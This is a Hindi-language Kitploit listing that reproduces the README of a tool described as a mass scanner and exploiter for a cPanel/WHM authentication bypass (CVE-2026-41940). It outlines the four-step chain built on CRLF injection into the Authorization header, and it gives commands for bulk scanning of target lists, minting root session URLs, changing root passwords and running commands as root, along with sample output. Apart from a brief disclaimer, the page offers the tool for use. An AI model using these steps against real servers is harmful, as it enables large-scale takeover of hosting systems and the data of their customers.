Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41940 — cPanel/WHM CVE-2026-41940 - सामूहिक स्कैनर और शोषक | Kitploit
उपकरण/GitHubGitHub/lutfifakee-project/cve-2026-41940
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलप्रमाणीकरणरेड टीमिंगपेलोड डेवलपमेंट
GitHublutfifakee-project/cve-2026-41940

CVE-2026-41940

cPanel/WHM CVE-2026-41940 - सामूहिक स्कैनर और शोषक

254 महीने पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखेंवेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-41940 - cPanel/WHM प्रमाणीकरण बायपास स्कैनर और एक्सप्लॉइट टूल

Python License Security Tested on

CVE-2026-41940 के लिए cPanel/WHM प्रमाणीकरण बायपास स्कैनर और एक्सप्लॉइट टूल


⚠️ अस्वीकरण

यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।

इस टूल का उपयोग करके, आप सहमत हैं कि:

  • आप केवल उन्हीं सिस्टमों का परीक्षण करेंगे जिनके मालिक आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
  • आप समझते हैं कि कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है।
  • इस टूल का उपयोग करते समय आप अपने कार्यों के लिए पूर्ण रूप से जिम्मेदार हैं।
  • आप इस टूल को पुनर्वितरित, संशोधित या अपना नहीं बता सकते।

❗ लेखक इस टूल के उपयोग से होने वाले किसी भी दुरुपयोग, अवैध गतिविधियों, क्षति या कानूनी परिणामों के लिए ।

जिम्मेदार नहीं है

🎯 अवलोकन

CVE-2026-41940 cPanel/WHM में एक गंभीर प्रमाणीकरण बायपास भेद्यता है जो हमलावरों को वैध क्रेडेंशियल्स के बिना अनधिकृत रूट-स्तरीय पहुँच प्राप्त करने की अनुमति दे सकती है।

यह टूल निम्नलिखित के लिए एक Python-आधारित कार्यान्वयन प्रदान करता है:

  • भेद्य लक्ष्यों का पता लगाना
  • शोषण को स्वचालित करना (अधिकृत परीक्षण के लिए)
  • बड़े पैमाने पर स्कैनिंग करना

🔥 4-चरणीय हमला श्रृंखला

चरणविवरण
1. प्री-प्रमाणीकरणwhostmgrsession कुकी प्राप्त करने के लिए /login/ पर अमान्य क्रेडेंशियल्स भेजें
2. CRLF इंजेक्शनcpsess टोकन लीक करने के लिए Authorization: Basic हेडर के माध्यम से न्यूलाइन इंजेक्ट करें
3. टोकन प्रसारटोकन को कैश में प्रसारित करने के लिए do_token_denied ट्रिगर करें
4. सत्यापनWHM रूट पहुँच की पुष्टि करने के लिए /json-api/version एक्सेस करें

✨ विशेषताएँ

विशेषताविवरण
🔄 बैच स्कैनिंगकई लक्ष्यों को एक साथ स्कैन करें
🎯 एकल लक्ष्यविस्तृत आउटपुट के साथ व्यक्तिगत लक्ष्य स्कैन करें
🔌 पोर्ट स्कैनिंगWHM पोर्ट (2082, 2083, 2086, 2087) का स्वतः स्कैन
🔓 सत्र URLएक-क्लिक WHM लॉगिन URL उत्पन्न करें
💀 RCEरूट के रूप में सिस्टम कमांड निष्पादित करें
🔑 पासवर्ड बदलेंWHM रूट पासवर्ड संशोधित करें
📡 WHM API कॉलWHM API फ़ंक्शन कॉल करें
🎨 रंगीन आउटपुटपरिणामों के लिए दृश्य आउटपुट
💾 परिणाम निर्यात करेंभेद्य लक्ष्यों को फ़ाइल में सहेजें

📋 आवश्यकताएँ

root@kitploit:~
Python 3.7+
pip install requests urllib3

🚀 स्थापना

root@kitploit:~
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt

# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com

📖 उपयोग

बुनियादी कमांड

root@kitploit:~
# Single target
python cpanel-mass-checker.py -u https://target.com:2087

# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20

# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt

# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com

# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com

# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com

# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com

📄 लक्ष्य फ़ाइल प्रारूप (targets.txt)

root@kitploit:~
# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083

⚙️ पैरामीटर

पैरामीटरविवरणउदाहरण
-uएकल लक्ष्य URL-u https://target.com:2087
-fलक्ष्य सूची फ़ाइल-f targets.txt
-cसमवर्तीता (थ्रेड्स)-c 20
-oआउटपुट फ़ाइल-o results.txt
-hostnameकस्टम Host हेडर-hostname cpanel.target.com
--scan-portsसभी WHM पोर्ट स्कैन करें--scan-ports
-sessionलॉगिन URL उत्पन्न करें-session
-passwdरूट पासवर्ड बदलें-passwd "NewPass123"
-cmdकमांड निष्पादित करें-cmd "id"
-keepअस्थायी खाता रखें-keep
-apiWHM API कॉल करें-api listaccts
-api-paramsAPI पैरामीटर-api-params "user=root,password=123"

📊 उदाहरण आउटपुट

बैच स्कैन

root@kitploit:~
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt

सत्र URL निर्माण

root@kitploit:~
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
    https://example.com:2087/cpsessXXXXXXX/

🛡️ भेद्यता विवरण

फ़ील्डमान
CVECVE-2026-41940
गंभीरतागंभीर (CVSS 9.8)
हमला वेक्टरनेटवर्क
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता सहभागिताकोई नहीं

प्रभावित संस्करण

  • WHM 11.110.x < 11.110.0.97
  • WHM 11.118.x < 11.118.0.63
  • WHM 11.126.x < 11.126.0.54
  • WHM 11.132.x < 11.132.0.29
  • WHM 11.134.x < 11.134.0.20
  • WHM 11.136.x < 11.136.0.5

⚠️ महत्वपूर्ण नोट्स

  • केवल अधिकृत सिस्टमों पर उपयोग करें
  • सत्र टोकन जल्दी समाप्त हो जाते हैं
  • प्रतिबंधित लाइसेंस पर RCE विफल हो सकता है
  • कुछ लक्ष्यों के लिए -hostname आवश्यक है
  • सभी ट्रैफ़िक HTTPS का उपयोग करता है

🧪 परीक्षण वातावरण

सुरक्षित और कानूनी परीक्षण के लिए:

  • अपना स्वयं का VPS/सर्वर उपयोग करें
  • एक भेद्य लैब वातावरण स्थापित करें
  • हमेशा लिखित अनुमति प्राप्त करें

⭐ सहायता

यदि इस प्रोजेक्ट ने आपकी मदद की, तो इसे ⭐ देने पर विचार करें

टूल डाउनलोड करें